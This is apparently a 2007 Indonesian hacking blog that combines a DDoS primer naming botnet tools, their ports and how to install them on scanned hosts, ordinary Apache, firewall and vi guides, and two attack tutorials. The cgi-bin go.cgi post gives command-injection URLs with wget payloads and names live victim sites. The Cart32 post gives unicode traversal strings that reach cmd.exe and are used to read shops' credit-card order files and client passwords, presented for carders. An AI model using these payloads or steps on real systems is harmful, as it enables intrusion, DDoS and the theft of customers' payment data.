Jumat, 26 Oktober 2007

ddos1

Jasakom,Sebelom membacanya sebaiknya sediain rokok ama kopi soalnya buwanyak banget, aku yang posting aja ampe bengong

1.Apakah itu DDOS ?

2.Definisi Denial of Service Attacks

3.Distributed Denial of Service (DDOS) Attacks.

4.Mengapa Serangan DDOS menjadi sangat populer ?

5.Efek dari serangan DDOS

6.Teknikal overview dari aplikasi DDOS

Apakah itu DDOS ?

Sampai dengan sekarang ini pengertian tetang DDOS adalah seperti yang anda dengarkan beberapa waktu yang lalu mengenai serangan terhadap web site Yahoo! MSN, CNN, Buy.com, eBay dan Amazon.com. Informasi terkini yang didapat kan adalah bahwa serangan hacker itu berasal dari West Coast, United States (Oregon dan California). Dari laporan FBI menuliskan bahwa serangan ini melibatkan beberapa network dari universitas yang ada di daerah tersebut yaitu Stanford, state California dan Santa. Barbara. Pada whitepaper ini akan dibahas sekilas mengenai cara serangan para hacker tersebut ke beberapa web site yang disebutkan di atas.

Definisi Denial of Service Attacks

Serangan Denial of Service(DOS) ini terjadi apabila penyerang atau yang sering terdengar dengan istilah hacker ini merusak host atau sevice yang ada sehingga host atau service itu tidak dapat lagi berkomunikasi secara lancar di dalam network neighborhood nya.

Serangan seperti ini juga dapat menghancurkan seluruh host dengan mengakibatkan “kernel panic” pada Linux dan keluarga UNIX lainnya atau lebih umumnya the “blue screen on death” nya Windows NT dan 98.

Serangan DOS ini dapat ditujukan dengan lebih spesifik terhadap services yang ada, contohnya seperti host Web Server dan fungsi dari Network Interface Card (NIC).

Bahkan yang lebih menyenangkan lagi si penyerang menargetkan serangan khusus pada network environment seperti network bandwith dengan menciptakan network request imitasi sehingga terjadi network bussy atau istilah yang lebih familiarnya bottleneck (yang pasti bandwith networknya menjadi full of waste ). Seperti anda ketahui bahwa bandwith adalah bagian yang sangat esensial dari koneksi internet (saluran ke internet). Dengan memenuhi saluran tersebut dengan infomasi sampah(network request imitasi) si penyerang dapat dengan bebas menguasai network bandwith yang masih available. Serangan DOS terakhir yang terjadi adalah pada tgl 7 January 2000.

Serangan DOS ini telah ada pada tahun 1988 yaitu Robert Moris Internet Worm, Melissa virus yang terkenal pada tahun dan masih banyak lagi kejadian DOS pada network dan perusahaan yang tidak diketahui.

Meskipun hal-hal ini disebabkan oleh worm, virusdan beberapa macam dari program yang ada, semua ini terjadi dengan cara yang sama yaitu : satu host menyampaikan informasi atau berkomunikasi dengan host lainnya dan kemudian secara efektif menghancurkan korban dengan mengirim segudang informasi yang tidak dapat di tanggani oleh korban itu sendiri.

Serangan Distributed Denial of Service (DDOS).

Perlu digariskan disini bahwa DOS dan DDOS adalah beda. DOS adalah serangan hanya dengan satu node sedangkan DDOS yaitu dengan beberapa node. Pada tahun 1998 kemajuan dari DOS yang tradisional terlihat dari 3 konsep baru serangan yaitu :

Serangan dengan melalui beberapa host.

Serangan dengan koordinasi diantara banyak individu yang ada (member dari pemakai network=internet)

Serangan dengan menggunakan distribusi system dimana hal ini untuk mencoba membuat bingung jalan menuju ke titik pusat serangan.

Si penyerang (titik pusat) menyerang host yang ada. Host tersebut tidak berkomunikasi secara langsung dengan korban. Host tersebut adalah administrator yang mengontrol dalam network mereka sendiri yang terdiri dari “Master” dan “Daemon”.Si penyerang dapat mengontrol/menguasai satu atau bahkan lebih node master tersebut. Master node secara umum akan mengontrol beberapa bahkan lusinan node daemon, yang kemudian akan di alamatkan ke targer/korban.Maka serangan yang dihasilkan akan berupa “packet storm” yang dapat menghancurkan host atau bandwith dari network tersebut.

Keuntungan dan perspektif sebagai hacker dengan menggunakan serangan DDOS yang dapat dilihat disini adalah :

Si Penyerang dapat menggunakan ratusan system untuk menghancurkan korban.

Serangan tersebut menghasilkan kiriman “packet” yang sangat besar dan dengan cepat dapat menghancurkan korban(target host).

Jika network atau host dapat diatur/dimanage dengan sukses dengan serangan ini, maka dapat anda bayangkan betapa besar koneksi yang digunakan oleh sebuah network dapat dihancurkan dengan serangan DDOS ini. Jadi semakin besar suatu jaringan maka akan semakin besar pula serangan yang ada(menyenangkan bukan ?).

Contoh kasus dapat anda lihat yaitu Yahoo! Dan eBay, perusahaan seperti ini menggunakan kompleks server yang disebut sebagai “cluster servers” dimana mereka bertujuan dengan memberikan service yang OK kepada pelanggan(bandwith yang OK dalam hal ini).Jadi dapat dilihat disini bahwa system yang “robust”(seperti banyak tertulis dalam produk Microsoft) dan system yang “well-managed” pun dapat dengan mudah dihancurkan dengan system serangan seperti ini. (tertarik anda untuk mencoba ?)Tidak hanya programming kita dapat menggunakan multi tier desain tapi dalam hacking pun ada desainnya. Dalam struktur multi tier ini korban akan sangat sulit melacak titik pusat dari serangan tersebut.

Sejauh ini sangat penting untuk dimegerti bahwa sebagian besar dari operator dari host dimana master dan daemon itu berada merupakan bagian pendukung dari DOS ini. Hal ini terjadi karena hacker telah berhubungan dengan master dan daemon node dimana mereka telah menginstall software DOS ini tanpa sepengetahuan pemilik host/administrator/operatornya. Seandainya si korban dapat melacak daemon host sekalipun, pemilik/operator dari host tsb tidak dapat memberikan informasi yang cukup untuk meneruskan upaya ini.

Mengapa Serangan DDOS menjadi sangat populer ?

Beberapa jawabannya dapat anda lihat dibawah ini :

Banyak Operating System dan aplikasi yang memberikan kemudahan dalam instalasi sehingga memberikan beberapa keuntungan seperti menghemat waktu mempelajarinya dan bahkan tidak perlu seorang ahli IT dalam mengoperasikannya. Maka akan sangat sulit bagi mereka untuk memberikan sekuriti kepada system yang mereka install secara otomatis tsb. Bukankah lebih mudah menginstall suatu program atau aplikasi dengan menggunakan default setting yang sudah ada. Contohnya dapat anda lihat pada system BII dan Bank Bali(segera di publish) di site Jasakom.

Banyak dari network environment bernasis pada single operating system. Contohnya jika menggunakan NT semuanya atau Linux di seluruh network environment. Router Cisco, dimana secara merata cara setting nya adalah sama di semua tempat.Arsitektur internet yang alami secara mendasar memang sangat tidak secure dan memerlukan lingkungan kerja yang complex, mahal dan banyak menghabiskan waktu.

Software yang semakin komplex. Kompleks dalam hal ini adalah mengenai source code sehingga hole-hole yang ada dapat di exploit oleh hacker. Contohnya saja seperti Microsoft yang banyak service packnya itu. Software yang ada semakin powerful. Dimana software-software yang ada dapat diakses tanpa harus dengan pengetahuan yang terlalu luas.

Kemajuan internet telah membawa banyak user yang tidak berpengalaman ikut serta dalam lingkungan networking sehingga akan lebih mudah bagi mereka untuk “misconfigured” system daripada memberikan keuntungan bagi system tsb. Serangannya sulit dilacak.

karena perlu waktu yang berhari-hari bahkan bulanan sehingga si penyerang sudah relatif lepas hari kesalahan yang ada.

5. Efek dari serangan DDOS

Secara umum end user atau korban serangan DDOS ini hanya sadar bahwa serangan seperti in hanya merupakan gangguan yang memerlukan restart system. Tetapi bagaimanapun juga hal seperti ini akan menggangu bisnis yang sedang dijalankan apalagi bisnis yang sangat tergantung kepada system di internet.

Serangan DDOS ini juga dapat merupakan pengalihan point of view dari si hacker untuk mendapatkan informasi penting yang ada. Pada dasarnya serangan DOS ini merupakan rangkaian rencana kerja yang sudah disusun oleh hacker dalam mencapai tujuannya yang telah ditargetkan. Jadi hacker tsb tidak hanya iseng mengadakan serangan DOS ini.

Contohnya adalah jika hacker tsb ingin menyerang Host B maka ia harus menggunakan computer A sebagai alat utk membingungkan korban dalam tracking si penyerang. Dan host A harus mempunyai trust relationship ke host B.

Tehnikal overview dari aplikasi DDOS

Berikut ini akan dibahas secara tehnikal software yang digunakan untuk melancarkan serangan DDOS ini. Mungkin pembahasan ini dapat digunakan sebagai bahan dalam memproteksi diri.

Disini kami hanya membahas 4 macam software dari yang sangat banyak di underground (swing-swing terbang oiii ) maaf jika anda berpikir saya terlalu berfantasi (I am TheDreamer)

§ The Tribal Flood Network (TFN)

TFN ini diciptakan oleh hacker yang cukup terkenal pada kalangan underground yang bernama Mixter. Aplikasi ini memungkinkan penyerang membuat flood connection dengan menggunakan protocol yang ada pada TCP/IP :

UDP : difokuskan pada domain name system dan network management program.

TCP : pusat e-mail dan web transaksi

ICMP : digunakan oleh para professional untuk troubleshooting network

Nama program masternya adalah : tribe.c dan program daemon bernama td.c

§ Trin00

Software ini menggunakan UDP untuk mengirimkan flood packets network dengan menggunakan UDP. Port yang digunakan adalah :

Attack to Master : TCP Port 27665

Master to Daemon : UDP Port 27444

Daemon to Master(s) : UDP Port 31335

Program master : master.c

Program Daemon : ns.c

Sebagai saran, program ini tidak bagus untuk digunakan karena master dan daemon berhubungan dengan clear text.

§ Stacheldraht

Program ini cukup ok dan masih baru lho. Nama program ini dalam bahasa Jerman yang berarti “Barb Wire” kenal kan dengan film Barb Wire si Pamela Anderson (Big Tit women). Sama sepeti TFN software ini menggunakan UDP, TCP, ICMP dalam menciptakan rootshell pada port port yang ada. Menggunakan komunikasi encrypt antar master dan daemon. Memiliki kemampuan mengupdate daemonnya sendiri secara otomatis. Maka dari itu program ini paling effisien dan cukup bahaya tapi keren banget.

Port TCP : 16660 dan 60001

Master program bernama : mserv.c

Daemon program bernama : td.c

Program ini memiliki client yang juga sebagai telnet : client.c

Komunikasi antara master dan agent menggunakan ICMP dan TCP sedangkan TFN hanya menggunakan ICMP.

§ TFN2K

Di realease pada tgl 21 Desember 1999. Seperti halnya Stacheldraht program ini meng encrypt tranmision. Berjalan pada platform Windows NT. Tetapi program ini lebih mudah di trace pada daemonnya.

Software DDOS lainnya yang dapat saya sebutkan disini adalah paket seperti bliznet, dscan dan saltine cracker. Dscan adalah software yang dapat scanning distribusi operating system dan cukup sulit untuk di lacak dalam penggunaannya. Sedangkan yang lebih keren lagi adalah saltine cracker suite yang dapat menembus password untuk site-site yang perlu authentication.

Dari ke-4 software di atas yang disebutkan kecuali Stacheldraht setiap software di atas memiliki aplikasi master dan daemon seperti yang telah dibahas sebelumnya diatas.

Sedangkan Stacheldraht memiliki client yang hampir sama dengan telnet. Dimana hacker dapat mengontrol ratusan PC hanya dengan component dari software tsb. Cara kerja dari component ini adalah seperti membuat cabang ke client software(cthnya seperti Windows 98 yang sudah memiliki Telnet client sendiri), jadi hacker dapat mengontrol master dan client.

Hal-hal dan sifat-sifat yang menarik dari kesamaan ke –4 software di atas adalah sbb :

Mudah di instalasi dan di gunakan.(Buruan deh dicoba) Tidak mudah dilacak jika digunakan, seperti pesawat hantu USA “Stealth” yang tidak dapat di deteksi oleh radar.Selain dari TFN2K, software lainnya tsb bekerja pada system UNIX. Aslinya software tsb di compiled untuk system Solaris tetapi sekarang telah ada yang dibuat untuk platform lainnya seperti Linux dan Windows NT.

Master dan Daemon selalu diproteksi dengan password.Pada Master component list dapat di daftarkan dengan mudah daemon yang ingin ditambahkan ke dalamnya.

Setiap DDOS aplikasi memiliki sign tersendiri, sehingga akan adanya kemungkinan untuk mendefinisikan master atau daemon yang telah diinstall di komputer anda.

Bagaimana menginstalasi program DDOS

Untuk menginstalasi program DDOS ini, master atau daemon node harus dikomunikasikan terlebih dahulu sehingga mendapatkan trust security. Untuk mendapatkan trust security adalah dengan cara yang sangat mudah. Gunakan scan tool dari range IP di internet kemudian setelah mendapatkan host-host tsb, baru diinstall client software pada host-host yang masih full of hole security. Satu hal yang cukup menarik adalah software client tsb dapat di uninstall dengan cara di set terlebih dahulu, di uninstall setelah berapa kali serangan.Hal ini dikarenakan dapat ditrace dengan mudah host yang menyerangnya.

Deteksi terhadap keberadaan installasi DDOS software

Dalam hal ini belum ditemukan tools yang paling OK dalam mendeteksi program DDOS ini.

Hal ini karena program DDOS masih menggunanakan system client-server yang masih tradisional. Program tsb menggunakan port tertentu pada saat aktif sehingga untuk dapat mencegah hal ini maka anda hanya dapat mencari port yang open untuk di closed dengan menggunakan perintah netstat.Anda juga dapat menggunakan perintah find / -name client, tetapi tentu saja anda sudah tahu program client yang diinstall pada komputer anda.Banyak dari program DDOS lebih banyak menggunakan fasilitas crontab UNIX yang secara automatic menjalankan aplikasi. Dalam hal seperti ini maka perlu check crontab apakah ada file yang termasuk dalam file-file yang perlu dicurigai sebagai client dari program DDOS ini.

Program yang dapat dipakai untuk mendeteksi program DDOS ini adalah

RID yang ditulis oleh si hacker Mixter (pembuat TFN dan TFN2K), anda dapat mencarinya di internet dengan mudah.Sickenscan yang dapat mendeteksi password default dari program Stacheldraht.Trin00killer adalah untuk me-remove program trin00 master dan daemonnya.

KONFIGURASI HTTP / WEB SERVER

#----------------------------------------------#

judul : KONFIGURASI HTTP / WEB SERVER

auth : 'di ambil oleh PakTani

email : PakTani@samarindahack.i-p.com , paktan1@yahoo.com

channel : #samarindahack

url : http://paktani.tk , www.samarindahack.org

#----------------------------------------------#

1. login root dan isi password root

2. edit file httpd dengan menjalankan mcedit :

# mcedit /etc/httpd/conf/httpd.conf

ServerType standalone

ServerRoot "/etc/httpd"

LockFile /var/lock/httpd.lock

PidFile /var/run/httpd.pid

ScoreBoardFile /var/run/httpd.scoreboard

ResourceConfig conf/srm.conf

AccessConfig conf/access.conf

Timeout 300

KeepAlive On

MaxKeepAliveRequests 100

KeepAliveTimeout 15

MinSpareServers 5

MaxSpareServers 20

StartServers 8

MaxClients 150

MaxRequestsPerChild 100

#Listen 3000

#Listen 12.34.56.78:80

BindAddress *

# LoadModule foo_module modules/mod_foo.so

#LoadModule mmap_static_module modules/mod_mmap_static.so

LoadModule vhost_alias_module modules/mod_vhost_alias.so

LoadModule env_module modules/mod_env.so

LoadModule config_log_module modules/mod_log_config.so

LoadModule agent_log_module modules/mod_log_agent.so

LoadModule referer_log_module modules/mod_log_referer.so

#LoadModule mime_magic_module modules/mod_mime_magic.so

LoadModule mime_module modules/mod_mime.so

LoadModule negotiation_module modules/mod_negotiation.so

LoadModule status_module modules/mod_status.so

LoadModule info_module modules/mod_info.so

LoadModule includes_module modules/mod_include.so

LoadModule autoindex_module modules/mod_autoindex.so

# Extra Modules

LoadModule perl_module modules/libperl.so

LoadModule php_module modules/mod_php.so

LoadModule php3_module modules/libphp3.so

#AddModule mod_mmap_static.c

AddModule mod_vhost_alias.c

AddModule mod_env.c

AddModule mod_log_config.c

AddModule mod_log_agent.c

AddModule mod_log_referer.c

# Extra Modules

AddModule mod_perl.c

AddModule mod_php.c

AddModule mod_php3.c

#ExtendedStatus On

Port 80

User nobody

Group nobody

ServerAdmin root@localhost

ServerName localhost

DocumentRoot "/home/httpd/html"

Options FollowSymLinks

AllowOverride None

Options Indexes Includes FollowSymLinks

AllowOverride None

Order allow,deny

Allow from all

UserDir public_html

DirectoryIndex index.html index.htm index.shtml index.cgi

AccessFileName .htaccess

Order allow,deny

Deny from all

UseCanonicalName On

TypesConfig /etc/mime.types

DefaultType text/plain

MIMEMagicFile share/magic

HostnameLookups Off

ErrorLog /var/log/httpd/error_log

LogLevel warn

LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\""

combin

LogFormat "%h %l %u %t \"%r\" %>s %b" common

LogFormat "%{Referer}i -> %U" referer

LogFormat "%{User-agent}i" agent

CustomLog /var/log/httpd/access_log common

CustomLog /var/log/httpd/referer_log referer

CustomLog /var/log/httpd/agent_log agent

CustomLog /var/log/httpd/access_log combined

ServerSignature On

Alias /icons/ "/home/httpd/icons/"

Options Indexes MultiViews

AllowOverride None

Order allow,deny

Allow from all

ScriptAlias /cgi-bin/ "/home/httpd/cgi-bin/"

AllowOverride None

Options ExecCGI

Order allow,deny

Allow from all

IndexOptions FancyIndexing

AddIconByEncoding (CMP,/icons/compressed.gif) x-compress x-gzip

AddIconByType (TXT,/icons/text.gif) text/*

AddIconByType (IMG,/icons/image2.gif) image/*

AddIconByType (SND,/icons/sound2.gif) audio/*

AddIconByType (VID,/icons/movie.gif) video/*

AddIcon /icons/binary.gif .bin .exe

AddIcon /icons/binhex.gif .hqx

AddIcon /icons/tar.gif .tar

AddIcon /icons/world2.gif .wrl .wrl.gz .vrml .vrm .iv

AddIcon /icons/compressed.gif .Z .z .

KONFIGURASI FIREWALL DAN GATEWAY

#----------------------------------------------#

judul : KONFIGURASI FIREWALL DAN GATEWAY

auth : 'di ambil oleh PakTani (sumber KPLI)

email : PakTani@samarindahack.i-p.com , paktan1@yahoo.com

channel : #samarindahack

url : http://paktani.tk , www.samarindahack.org

#----------------------------------------------#

================================

1. Login sebagai root dan isi password.

2. Lihat isi file ip_forward menggunakan perintah cat :

#cat /proc/sys/net/ipv4/ip_forward

0

3. Ubah Nilai atau on kan paket ip_forward mengunakan echo :

#echo "1" > /proc/sys/net/ipv4/ip_forward

#cat /proc/sys/net/ipv4/ip_forward

1

4. Jalankan Linuxconf :

#linuxconf

|_ Firewalling

|_ Firewalling Defaults (packets filtering)

- Forwarding rules [x]

- CuSeeMe [x]

- Ftp [x]

- Irc [x]

|_ Forward Firewalling

|_ Add

- [x] This rule is active

- Protocol : All

- [x] Do Masquerading

- Rule's policy : (o) Accept

- Host or Network : 192.168.0.0

- Netmask : 255.255.255.0

- Accept : [x] Tcp Syn Packet

- Host or Network : 0.0.0.0

- Netmask : 255.255.255.0

- Accept : [x] Tcp Syn Packet

- Logging : [x] is enabled

|_ Add

- [x] This rule is active

- Protocol : All

- [x] Do Masquerading

- Rule's policy : (o) Accept

- Host or Network : 127.0.0

- Netmask : 255.255.255.0

- Accept : [x] Tcp Syn Packet

- Host or Network : 0.0.0.0

- Netmask : 255.255.255.0

- Accept : [x] Tcp Syn Packet

- Logging : [x] is enabled

selanjutnya aktifkan konfigurasi linuxconf firewalling anda dengan menjalankan

perintah :

5.Update konfigurasi network anda setelah menjalankan linuxconf dengan menjalankan perintah berikut :

# netconf --update

Checking base configuration

Checking kernel's modules

Mounting local volumes

Checking files permissions

Checking LILO

Executing some Sysv init scripts

Executing: /etc/rc.d/rc5.d/S10network reload

Setting firewalling

6.Lihat isi konfigurasi ipchains anda dengan menggunakan perintah berikut :

# ipchains -L -n

Chain input (policy ACCEPT):

Chain forward (policy DENY):

target prot opt source destination ports

MASQ all ----l- 192.168.0.0/24 0.0.0.0/24 n/a

MASQ all ----l- 127.0.0.0/24 0.0.0.0/24 n/a

Chain output (policy ACCEPT):

Maka coba konfigurasikan Dial-Up anda dengan menggunakan Gnome X Window.

1.Klik Gnome Star

2.Klik Internet + Dial Up Config Configuration Tool

- Pilih Add

- Selanjutnya menu Desktop Create a new Internet Connection maka Pilih NEXT

- Menu Phone number and name

- Account name : telkom

- Prefix : kosongkan

- Area/Country code : kosongkan

- Phone Number : 080989999

3.Pilih NEXT

4.Pada Menu Desktop User name and password isi sesuai dengan :

- User name : telkomnet@instan

- password : telkom

5.Pilih NEXT

6.Menu Other option Pilih Normal ISP + Next

7.Pada menu Create the account Pilih Finish

Konfigurasi Modem :

1.Pada menu Internet Connection Pilih Modem + Add

2.Menu Desktop Edit Modem Properties :

- Modem Device : /dev/ttys1 (com2) /dev/ttys0 (com1)

- tandai pada Auto configuration

- Pilih OK

Untuk selanjutnya maka koneksi ke ISP dapat dilakukan dengan melakukan perintah :

-> Gnome Star + Internet + RH PPP Dialer

bila ada pilihan choice (pilih) maka pilih Telkom, maka modem akan mendial nomer 080989999 tunggu sesaat hingga muncul koneksi desktop atau menu koneksi akan secara otomatis hilang dari desktop.

Untuk memastikan koneksi maka jalan perintah :

# route -n

Destination Gateway Genmask Flags Metric Ref Use Iface

192.168.0.1 0.0.0.0 255.255.255.255 UH 0 0 0 eth0

192.168.0.0 192.168.0.1 255.255.255.0 UG 0 0 0 eth0

192.168.0.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0

127.0.0.0 0.0.0.0 255.0.0.0 U 0 0 0 lo

0.0.0.0 192.168.0.254 0.0.0.0 UG 1 0 0 eth0

# ping www.telkom.net

apabila semua terkoneksi maka biarkan perintah ping berjalan dengan

sendirinya, dan perintah ping juga menjadi ukuran seberapa cepat koneksi

data dari komputer / server anda ke Internet Service Provider (ISP).

Menggunakan vi sebagai Editor

###############################################

Menggunakan vi sebagai Editor _ _

copyright(c) @oh_gayo o' |,=./ `o

akhir Maret 2003 (o o)

============================ ooO--(_)--Ooo-===

[ powered By oh_gayo ]

Selamat dengan port anda sekarang anda telah membuka dan membaca tutorial ini!

Tutorial ini adalah tutorial dasar untuk pemula yang binggung gimana caranya menggunakan

editor khususnya editor vi di linux dan di unix tentunya.

1. Pendahuluan

Editor Vi memiliki banyak fasilitas yang sangat membantu para programer, namun para pemakai pemula menghindari vi karena mereka menganggap editor ini sangat sulit dan membingungkan. tulisan ini akan mengajarkan anda giman cara menggunakan vi

Editor Vi (baca : vi ai ) adalah layar yang digunakan oleh banyak pemakai Unix.

sama hal nya program Edit pada MS-dos.

Macam-macam editor di linux

1.vi

2.pico

3.joe

4.emacs

5.dll

2. Lansung saja

a. Cara memulai dan mengakhiri Vi

gayo@Vanadium:~$ vi [nama_file] --> untuk memulai yang diedit/baru

gayo@Vanadium:~$ untuk mengakhiri Vi tekan [ Esc ] lalu ketik : q

b. ^

atas

ka>

bawah

v

* Tombol ka ada dikanan,untuk bergerak kekanan.

* Tombol ki ada dikiri,untuk bergerak kekiri.

* Tombol a ada diatas dan untuk bergerak atas

* Tombol b ada dibawah dan untuk bergerak bawah

ada beberapa perintah untuk mengerakan cursor :

^ artinya : tekan tombol ctrl

g : untuk berpindah ke baris tertentu

^F : berpindah satu layar penuh ke bawah

^B : berpindah satu layar penuh ke atas

^D : berpindah satu setengah layar penuh ke bawah

^U : berpindah satu setengah layar penuh ke atas

^w : berpindah satu kata kedepan

^b : berpindah satu kata kebelakang

c. Mengedit Teks

tekan Esq tekan

* i (insert) : memasukan teks baru

* a : menambah teks setelah kursor saat ini

* o : membuka newline setelah baris saat ini

* O : membuka newline sebelum baris saat ini dan menambah teks

* x atau delete: menghapus satu character

* dd : menghapus satu baris

* u : undo membatalkan perintah

* p : menaruh teks

* w : menyimpan teks

* wq : menyimpan lalu keluar

* e : membuka berkas

* /[textnya] : untuk pencarian kata KEATAS

* ?[textnya] : untuk pencarian kata KEBAWAH

* w namafile : bila belom ada nama filenya

yang sering dipakai oleh lamerz.. yaitu melalukan copy paste baik itu program maupun exploit source ...

Caranya :

Copy :

tekan tombol ESC

Navigasi ke baris dimana teks yang ingin dicopy berada. Jika Anda hanya ingin mengopy 1 baris, maka tekanlah tombol y dua kali.

Jika banyak tekanlah shift+v untuk memblok kemudian tekanlah tombol y sekali kali(buat paste).

Paste Navigasi ke lokasi dimana teks yang berada di memory ingin Anda letakkan.

Tekan tombol ESC

tekan tombol p

Cut

Sama seperti copy, tetapi gantilah tombol y dengan tombol d.

Pengen editornya berwarna warni seindah pelangi... ok sebelom kita dapat mengenal itu file bertype apa misalkan bahasa terkenal seperti c, python,php,cgi, dll coba tebak pake apa ? :p (bila anda mencari tahu berarti anda sudah menyukai editor vi)

Perintah-perintah yang barusan ditulis.. adalah perintah-perintah dasar yang sering kita pakai sebenarnya masih banyak lagi perintah-perintah untuk memanipulasi text dalam suatu file.!

thank's for my friend's on dalnet: #samaridahack,#renjana

Minggu, 21 Oktober 2007

Cgibin

Author : Watchers

cgi-bin/go.cgi?go=|[command]|

Lagi lagi bug baru dari /cgi-bin/. Target memang rada rada sedikit, apakah karena belum dipublikasikan atau memang para webmaster tdk suka menggunakan cgi-bin.go.cgi belum jelas. namun dari pencarian yang penulis lakukan, masih sedikit yang menggunakan tools tersebut.

lebih lanjut...

bug ini sama seperti yang bug lain, yaitu kita tetap bekerja di web browser.

Berikut ini syntax penulisannya yaitu :

http://www.domainname.com/cgi-bin/go.cgi?go=|command|

Dibagian command kita bisa memberikan perintah perintah linux. Karena memang target ini adalah linux.

Beberapa contoh perintah yang bisa kita terapkan antara lain :

1. wget

http://www.domainname.com/cgi-bin/go.cgi?go=|wget www.jelaga-online.org/index.html -O /tmp/test.html|

2. id, ls -al, whoami, http://www.domainname.com/cgi-bin/go.cgi?go=|id|

dan yang lain lainnya tergantung dari improvisasi anda.

Dari beberapa yang penulis coba, ternyata mendapatkan OS REDHAT, DEBIAN dan FreeBSD. Mungkin bagi teman teman yang lain bisa menemukan improvisasi yang lain.

Beberapa target yang berhasil penulis test antara lain :

1. www.canada-immigrating.com

2. www.messiahpage.com

3. www.lpwi.org

Mungkin sekian dulu, dan #renjana sangat menngharapkan masukan masukan dari yang lain, agar share ilmunya tetap terjalin.

Thanks :

Phaty atas sample nya

Cupid^ yang telah memberikan bug nya 3 hari yang lalu

Teman teman semuanya dalam renjanaCREW.

Keep on Learn everything

Cart32 v3.5a Exploit

Judul : Cart32 v3.5a Exploit

Oleh : r3v0lt

Peringatan :

Segala informasi yang dimuat di artikel ini hanyalah untuk digunakan sebagai bahan referensi untuk tujuan pengetahuan saja. Informasi bukanlah kejahatan. Mengetahui cara berbuat sesuatu *BUKANLAH* kejahatan. Gunakan informasi ini untuk melindungi diri kamu sendiri.

Tutorial ini ditulis berdasarkan pengalaman gua selama menjelajahi dunia maya. Dikumpulkan dari berbagai tutorial dan hasil ngobrol di #. Dan tulisan ini di peruntukkan untuk para newbies. Buat yang udah para CARDER tulen, kalo nich tutorial banyak kesalahan gua minta di kritik OK!

TUTORIAL I : Cart32 v3.5a

----------------------------------------

NB : Hanya bisa digunakan kepada beberapa situs yang memiliki kelemahan yang sama.

Langkah 1: Dapatkan terlebih dahulu Website Cart32 v3.5a

Langkah 2: Masuk ke website Cart32.exe

http://target/login/unicode/cart32.exe

(contoh : http://www.connectionsmall.com/scripts/cart32.exe/)

Langkah 3: Setelah kamu masuk kesana, akan diperlihatkan tampilan seperti dibawah ini :

========================================

Cart32 v3.5a

Shopping Cart System for Windows

http://www.cart32.com/

Registered to Greymane Connections

License: Unlimited clients

©1996-2001 McMurtrey/Whitaker & Associates, Inc.

Build 714

========================================

Langkah 4: Sekarang yang harus kamu lakukan adalah memasukkan ekstensi berikut di

akhir URL, 98% memakai #1 & #2

a. (..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\)

b. (..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\)

c. (..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\) HANYA DIGUNAKAN KADANG2!

(contoh : http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\)

Langkah 5: Saat kamu berada di direktori utama (c:\), untuk masuk ke cc's, masukan kembali (\progra~1\MWAInc\Cart32\) ke akhir URL tadi sehingga sekarang

kamu dapat melihat seperti : http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\

Sekarang kamu dapat melihat banyak file seperti :

2814659000-001001.c32

2814659000-001002.c32

2814659000-001003.c32

Langkah 6: Copy salah satu dari nama file tersebut dan kemudian masukkan ke akhir URL, dan akan terlihat seperti :

http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\2814659000-001003.c32

Catatan : Diistu kamu akan melihat file lain yang berisi banyak sekali cc's seperti :

RONACK-orders.txt (file ini tidak berada pada situs yang khusus ini)

procure-orders.txt (file ini tidak berada pada situs yang khusus ini)

Langkah 7: Sebelum kamu mengakses tipe file yang lain, pertama kamu harus mengganti

*c+dir+c:\* ke *c+type+c:\*

========================================

TUTORIAL II : Cart32 v3.5a

----------------------------------------

Target: http://www.partybows.com

1. Ke http://www.partybows.com

2. Klik http://www.partybows.com/seasonal.htm

3. Isi Quantity= 1

Pokoknya kayak lu pura2x beli dan klik order

4. Maka akan kesini jadinya :

https://secure.axionet.com/partybows/cgi-bin/cart32.exe/partybows-AddItem

5. Ubah menjadi

https://secure.axionet.com/partybows/cgi-bin/cart32.exe/error

Cart32 v3.5 Error

CART32 Build 619

The following internal error has occurred: Invalid procedure Error Number = 5

Click Here For Possible Solutions

etc.

6. Cari log order-nya

Cart32 Setup Info and Directory

Mail Server = mail.axion.net

Section=Main

AdminDir = D:\secure\webroot\partybows\cgi-bin\cart32\

Jadi partybows-orders.txt

7. Sehingga akhirnya : http://www.partybows.com/cgi-bin/cart32/partybows-orders.txt

========================================

TUTORIAL III : Cart32 v3.5a

----------------------------------------

search +/scripts/cart32.exe/

Exploitable Directories

-/scripts/cart32.exe

-/scripts/cart32.exe/cart32clientlist

-/script/c32web.exe/ChangeAdminPassword

-/scripts/c32web.exe

-cgi-shl/c32web.exe/

Wherever there is the cart32.exe add this to the end of it /cart32clientlist

and erase the rest

a menu will come up with a submit box

click go

it will list ALL clients

and their passwords

passwords will be encrypted

after decrypting the password, go to wherever the c32web.exe file is

thats the instructions wit exploits

what that channel we were just in called